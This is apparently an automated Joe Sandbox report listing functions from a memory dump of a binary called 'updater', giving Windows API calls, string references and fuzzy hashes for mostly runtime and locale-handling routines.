TABLE %s, xrefs: 013F1B4A

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID: %z AS %s$%z ORDER BY$%z USING PRIMARY KEY$%z VIRTUAL TABLE INDEX %d:%s$%z WITH INDEX %s$:$L$TABLE %s
API String ID: 0-162927363
Opcode ID: 3191fb12a03202eb2c0c6512d30ba18a6a2feba77fb642894baabb6f64ad9161
Instruction ID: 9974d76616fea6d68a48e21ee69413a87cdc5f81e68073c1be1e9c302f275dbc
Opcode Fuzzy Hash: 3191fb12a03202eb2c0c6512d30ba18a6a2feba77fb642894baabb6f64ad9161
Instruction Fuzzy Hash: 72D22771608341DFD714DF28D840A2BBBE6BFC8718F14892DFA899B2A1D771D945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0142A932 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 0142049B: GetLastError.KERNEL32(?,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 014204A0
Part of subcall function 0142049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 0142053E

GetACP.KERNEL32(?,?,?,?,?,?,0141E6A8,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 0142A9F3
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0141E6A8,?,?,?,00000055,?,-00000050,?,?), ref: 0142AA1E
_wcschr.LIBVCRUNTIME ref: 0142AAB2
_wcschr.LIBVCRUNTIME ref: 0142AAC0
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0142AB81

Strings

utf8, xrefs: 0142AAF0

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: 76f8a0d3c98bde8ceed97ac62e5c5c03c526811f225e6cb79177f56d92184301
Instruction ID: 713217e4b8934b58f794543ea54f6751a403e29b81e215a223f4160b5c54381e
Opcode Fuzzy Hash: 76f8a0d3c98bde8ceed97ac62e5c5c03c526811f225e6cb79177f56d92184301
Instruction Fuzzy Hash: 47713D71600222AAEB25EB3ACC45F6777A9EF58700FA4482FEE05D76A0E770D5C5C760

Uniqueness

Uniqueness Score: -1.00%

Function 0142CE9E Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1420COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0142D019

Strings

1#QNAN, xrefs: 0142E1B7
1#SNAN, xrefs: 0142E1B0
1#INF, xrefs: 0142E1D4
1#IND, xrefs: 0142E1A9

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 1708e8e73eb4ecf2fbea0cc2e04197903ab93854a7a9d2e3e01c459227224ad9
Instruction ID: d402178f0cc7682b0d0b23b1b5365b1047c444c34e44f8ae7fd78575d587b126
Opcode Fuzzy Hash: 1708e8e73eb4ecf2fbea0cc2e04197903ab93854a7a9d2e3e01c459227224ad9
Instruction Fuzzy Hash: 8DC24671E046288FDB25CE68DD407EAB7B5EB89314F9441EBD90EE7250E774AE818F40

Uniqueness

Uniqueness Score: -1.00%

Function 0142B0BE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,0142B3DC,00000002,00000000,?,?,?,0142B3DC,?,00000000), ref: 0142B157
GetLocaleInfoW.KERNEL32(?,20001004,0142B3DC,00000002,00000000,?,?,?,0142B3DC,?,00000000), ref: 0142B180
GetACP.KERNEL32(?,?,0142B3DC,?,00000000), ref: 0142B195

Strings

OCP, xrefs: 0142B112
ACP, xrefs: 0142B0DC

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 47b820022a0a95a2f431b8017602a117cb35a986b5ad35209e3452832ec24b46
Instruction ID: 790234937f1a48fe5a7da27c83dfdb8396bfddca4a0669c285a18fc34aea43ef
Opcode Fuzzy Hash: 47b820022a0a95a2f431b8017602a117cb35a986b5ad35209e3452832ec24b46
Instruction Fuzzy Hash: 3921CB72B00120A6EB358F58C801AB777A7EB44ED0BE68466E949C7335E732DEC1C350

Uniqueness

Uniqueness Score: -1.00%

Function 0142B293 Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 0142049B: GetLastError.KERNEL32(?,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 014204A0
Part of subcall function 0142049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 0142053E

Part of subcall function 0142049B: _free.LIBCMT ref: 014204FD
Part of subcall function 0142049B: _free.LIBCMT ref: 01420533

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0142B39F
IsValidCodePage.KERNEL32(00000000), ref: 0142B3E8
IsValidLocale.KERNEL32(?,00000001), ref: 0142B3F7
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0142B43F
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0142B45E

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: c77b199e42575ef1207f7debfa67fb211421119d06df35a059b5a83e98112362
Instruction ID: d4283e174b32c081bdfdd46479f468e26e72860f97a3db34ea75d6828fcd494a
Opcode Fuzzy Hash: c77b199e42575ef1207f7debfa67fb211421119d06df35a059b5a83e98112362
Instruction Fuzzy Hash: E3519371A00226ABEB20DFA9CC40BBF77B8FF58700F94446AEE50E7260D7709584CB61

Uniqueness

Uniqueness Score: -1.00%

Function 014124FE Relevance: 6.1, APIs: 4, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 01412527
GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0141253B
VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004,?,?,?,0000001C), ref: 0141258B
VirtualProtect.KERNEL32(?,-00000001,00000104,?,?,?,0000001C), ref: 014125A0

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: Virtual$AllocInfoProtectQuerySystem
String ID:
API String ID: 3562403962-0
Opcode ID: 098a1401e6f57bffb84311671c0368ca868923fcd587bfbdc142b30cb3d5c77f
Instruction ID: 4aea70192a02f17ca1c1726f511f97e99deeb3f0e4584693db87ede6cb1caba7
Opcode Fuzzy Hash: 098a1401e6f57bffb84311671c0368ca868923fcd587bfbdc142b30cb3d5c77f
Instruction Fuzzy Hash: 18219572E00119BBDF20DFA9CC95EEFBBB9EB44650B140426EA06F7258E6B4D904C790

Uniqueness

Uniqueness Score: -1.00%

Function 0141337D Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 01413475
SetUnhandledExceptionFilter.KERNEL32 ref: 0141347F
UnhandledExceptionFilter.KERNEL32(?), ref: 0141348C

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 5816975457fb3a1c5dc53ac05de1ea61a2cf44577b072f1cf2c384d8d6b758d4
Instruction ID: fc90d00a09ff6d75267b978bec507c9620cde1cc79a8453ee4977710db6ce3ab
Opcode Fuzzy Hash: 5816975457fb3a1c5dc53ac05de1ea61a2cf44577b072f1cf2c384d8d6b758d4
Instruction Fuzzy Hash: 9E31D87490121D9BCB62DF69D98878DBBB4BF18310F5045EAE41CA7260E7709B858F44

Uniqueness

Uniqueness Score: -1.00%

Function 013B433F Relevance: 4.5, APIs: 3, Instructions: 43COMMON

Download Yara Rule

APIs

LoadResource.KERNEL32 ref: 013B434B
LockResource.KERNEL32(00000000), ref: 013B4356
SizeofResource.KERNEL32 ref: 013B4364

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: Resource$LoadLockSizeof
String ID:
API String ID: 2853612939-0
Opcode ID: 841a25eabd639413a481f3c2176218ce6644b1d766ae25612734a32a74fdaee7
Instruction ID: a23ea71ab959f72d2fad638e6e72ee7b37108df745c5cec9d642b4a5412d5227
Opcode Fuzzy Hash: 841a25eabd639413a481f3c2176218ce6644b1d766ae25612734a32a74fdaee7
Instruction Fuzzy Hash: 3CF0FC7350112597DB310A5D9CCC8ABFBACDB8461A30D082AFE8FD7916FB70DC508694

Uniqueness

Uniqueness Score: -1.00%

Function 0141A340 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13efcb69164dcbb8558fc26197092f320b08139c4161ff7fcae7fe7da06277c8
Instruction ID: fc1a61fe454b5b55375f9744c1b396f1129dbd313afe3c619b4e0ace3121859a
Opcode Fuzzy Hash: 13efcb69164dcbb8558fc26197092f320b08139c4161ff7fcae7fe7da06277c8
Instruction Fuzzy Hash: 2BF15071E012599FDF14CFA9C9806AEBBB1FF88314F25826AD919A7355D730AA01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0140D58A Relevance: 3.0, APIs: 2, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,?,0140D265,?,00000022,00000000,00000002,?,?,01402908,00000004,013FCD4E,?,00000004,013FE352,00000000), ref: 0140D5AC
GetLocaleInfoW.KERNEL32(00000000,?,?,?,?,?,0140D265,?,00000022,00000000,00000002,?,?,01402908,00000004,013FCD4E), ref: 0140D5B7

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 5c1a0313922c4de1a1482bc73cf552ea9da88f508c5353b325e05ba981ab0878
Instruction ID: ec645b26c627c87fdba701feed180d7ae7fcd4aa0be64b715ef1880579c64d3d
Opcode Fuzzy Hash: 5c1a0313922c4de1a1482bc73cf552ea9da88f508c5353b325e05ba981ab0878
Instruction Fuzzy Hash: F3E0EC72905128EB8F136FDAEC088AE7F69EF046657044026FE05572B4DB7299609BD1

Uniqueness

Uniqueness Score: -1.00%

Function 013D39FA Relevance: 3.0, APIs: 2, Instructions: 15windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,?,00000000), ref: 013D3A09
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 013D3A17

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 575e1820f91d7ae1f3817e17c6ba43d49a41ddeabd72f195f9c068e1af536cca
Instruction ID: c9dafa8635122af7c59c1748a89c195343bd86eec59964dce4edf71344d24fd5
Opcode Fuzzy Hash: 575e1820f91d7ae1f3817e17c6ba43d49a41ddeabd72f195f9c068e1af536cca
Instruction Fuzzy Hash: DFD0C9B5284308BBF6105A849C06FBAB7ACE708B42F008000BB48890D4C6B068108761

Uniqueness

Uniqueness Score: -1.00%

Function 014253C4 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,014253BF,?,?,00000008,?,?,0142EF09,00000000), ref: 014255F1

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 6d1d1cc3ee2c05cee4a70bacd6f07d9c50201ab5985d884dd6ac674f60c52460
Instruction ID: e7d7ceadd8a3d86f47b5c31bba684a7b90784432a901df84832af1f2dff5d40d
Opcode Fuzzy Hash: 6d1d1cc3ee2c05cee4a70bacd6f07d9c50201ab5985d884dd6ac674f60c52460
Instruction Fuzzy Hash: 07B16B312106149FE725CF2CC486BA57BA1FF05364F658659E999CF3B1C335E992CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0140E678 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0140E68E

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 5299fa070e08f56cc98779263e20dbb773ef581a2d7ad851aa70d74b981f0804
Instruction ID: 7efe032a4f500a1f7e5200efd2c1017f76c1ae3a0a2fc75808100aa8aaf66e62
Opcode Fuzzy Hash: 5299fa070e08f56cc98779263e20dbb773ef581a2d7ad851aa70d74b981f0804
Instruction Fuzzy Hash: E3516DB2A013058BEB26CF5AD485BAABBF1FB48310F14886BD911E73A5E374D950CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0142AF98 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 0142049B: GetLastError.KERNEL32(?,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 014204A0
Part of subcall function 0142049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 0142053E

Part of subcall function 0142049B: _free.LIBCMT ref: 014204FD
Part of subcall function 0142049B: _free.LIBCMT ref: 01420533

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0142AFEC

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorLast_free$InfoLocale
String ID:
API String ID: 2003897158-0
Opcode ID: 3fcb805c424cf86e9ff0d6ce56d4e7690471ce71c1ef45f51fd033d4368812c9
Instruction ID: 1687908085d65623568663c46180e5a651694d14da1480487852d14665de163b
Opcode Fuzzy Hash: 3fcb805c424cf86e9ff0d6ce56d4e7690471ce71c1ef45f51fd033d4368812c9
Instruction Fuzzy Hash: C121F5B2501216ABEB299E29CC41E7B77A8EF15310F50407FEE11D72A1EB78D9808B50

Uniqueness

Uniqueness Score: -1.00%

Function 0142AC1F Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 0142049B: GetLastError.KERNEL32(?,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 014204A0
Part of subcall function 0142049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 0142053E

EnumSystemLocalesW.KERNEL32(0142AD45,00000001,00000000,?,-00000050,?,0142B373,00000000,?,?,?,00000055,?), ref: 0142AC91

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 55a37d881c93232ff38f50282b61f649cd026340b222089e0bc0f1b9ef3e5352
Instruction ID: 5fb7e0883195fa6bae59217b4c3ea8d9a39c44165fd70b3a7559b1e5b6ebda79
Opcode Fuzzy Hash: 55a37d881c93232ff38f50282b61f649cd026340b222089e0bc0f1b9ef3e5352
Instruction Fuzzy Hash: D211C63A2047155FDB189F3A889157AB792FB80359B64442EE98747B50D7716982C740

Uniqueness

Uniqueness Score: -1.00%

Function 0142B1C4 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 0142049B: GetLastError.KERNEL32(?,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 014204A0
Part of subcall function 0142049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 0142053E

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0142AF61,00000000,00000000,?), ref: 0142B1F0

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 1295fb00ebd2540c08fb9ce0c2e6eb6cad5056734e6c832ed8daab306f57767e
Instruction ID: a276b8521faacef8ee0c7b622449b3eed39b2736a2a8b3e4ab085a98c8fef69e
Opcode Fuzzy Hash: 1295fb00ebd2540c08fb9ce0c2e6eb6cad5056734e6c832ed8daab306f57767e
Instruction Fuzzy Hash: 2FF0FE365102226BDB245B259C0DABF7B54DB41254F54082ADD01E3650DE70FE81C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 0142AF96 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 0142049B: GetLastError.KERNEL32(?,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 014204A0
Part of subcall function 0142049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 0142053E

Part of subcall function 0142049B: _free.LIBCMT ref: 014204FD
Part of subcall function 0142049B: _free.LIBCMT ref: 01420533

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0142AFEC

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorLast_free$InfoLocale
String ID:
API String ID: 2003897158-0
Opcode ID: 57fe068c7f6379cfa379b2c42e7885ae24001a64009d0b39491a31ee3f5534a6
Instruction ID: 5a540a3846a3366c2ddcd650f6bc3f83e7d1331f3af865f9f1bc4ac0367626d2
Opcode Fuzzy Hash: 57fe068c7f6379cfa379b2c42e7885ae24001a64009d0b39491a31ee3f5534a6
Instruction Fuzzy Hash: 8CF0287260021AABDB28EF35DC41EFA33E8DB54310F40417FFA02E7290DA78AD428790

Uniqueness

Uniqueness Score: -1.00%

Function 0142ACBA Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 0142049B: GetLastError.KERNEL32(?,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 014204A0
Part of subcall function 0142049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 0142053E

EnumSystemLocalesW.KERNEL32(0142AF98,00000001,00000000,?,-00000050,?,0142B337,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0142AD04

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 224413b97b9bc5a2280df0870938d1c077a024178e6176cf483b231b155ca438
Instruction ID: 677eb5a2cd01d7faeeb843d8e2aa0dbf7121e152a4bac6615539f392e0354714
Opcode Fuzzy Hash: 224413b97b9bc5a2280df0870938d1c077a024178e6176cf483b231b155ca438
Instruction Fuzzy Hash: 74F04C762003151FDB149F3AD884A7A7B91EF80318B65442EFD0287AA0C6715882C750

Uniqueness

Uniqueness Score: -1.00%

Function 0141F7EF Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

